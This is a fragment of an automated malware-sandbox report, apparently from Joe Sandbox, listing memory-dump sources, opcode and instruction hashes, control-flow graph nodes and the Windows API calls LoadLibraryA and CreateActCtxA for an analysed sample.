                                        • Source File: 00000006.00000002.562036965.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_b90000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: d9a7416adfae103515974dab915d26c00bf48f14080c34e9b5d0861cd33ab341
                                        • Instruction ID: 5e4a893e3918bc45be640274a0b41f599f2d83fc60412f3ba724afc852361417
                                        • Opcode Fuzzy Hash: d9a7416adfae103515974dab915d26c00bf48f14080c34e9b5d0861cd33ab341
                                        • Instruction Fuzzy Hash: F64144B1D006589FDB10CFA9C88579EBFF1EB48304F14816AE815AB385D7749846CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 840 b992a0-b9ca07 842 b9ca09-b9ca2e 840->842 843 b9ca5b-b9caa7 LoadLibraryA 840->843 842->843 848 b9ca30-b9ca32 842->848 846 b9caa9-b9caaf 843->846 847 b9cab0-b9cae1 843->847 846->847 853 b9caf1 847->853 854 b9cae3-b9cae7 847->854 850 b9ca55-b9ca58 848->850 851 b9ca34-b9ca3e 848->851 850->843 855 b9ca40 851->855 856 b9ca42-b9ca51 851->856 859 b9caf2 853->859 854->853 858 b9cae9 854->858 855->856 856->856 857 b9ca53 856->857 857->850 858->853 859->859
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?), ref: 00B9CA97
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.562036965.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_b90000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 299ba3c27c1429c3368c3a30ca4416dc0947cc4132be0d7f419df88836279021
                                        • Instruction ID: 196e18252021c16fbf6be47bc22c6022b80914c0a2ef52042d5a6834254d7285
                                        • Opcode Fuzzy Hash: 299ba3c27c1429c3368c3a30ca4416dc0947cc4132be0d7f419df88836279021
                                        • Instruction Fuzzy Hash: E64124B1E006589FDF10CFA9C88579EBFF1EB48314F10816AE815AB385D7B49846CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 879 b91b2c-b93001 CreateActCtxA 882 b9300a-b93064 879->882 883 b93003-b93009 879->883 890 b93073-b93077 882->890 891 b93066-b93069 882->891 883->882 892 b93079-b93085 890->892 893 b93088 890->893 891->890 892->893 894 b93089 893->894 894->894
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00B92FF1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.562036965.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_b90000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 9ecc503e3eccb65a8766032e93d7a0693d4ede869fcad04818af4c8d53b7f99a
                                        • Instruction ID: 393f071c69bf49d2e3044f867db677bb72b897fd0b10a59707c98d3d8e1daaa0
                                        • Opcode Fuzzy Hash: 9ecc503e3eccb65a8766032e93d7a0693d4ede869fcad04818af4c8d53b7f99a
                                        • Instruction Fuzzy Hash: 7141D0B1C04658CBDF24CFA9C884BDEBBF5BF89304F208169D509AB251DB756946CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%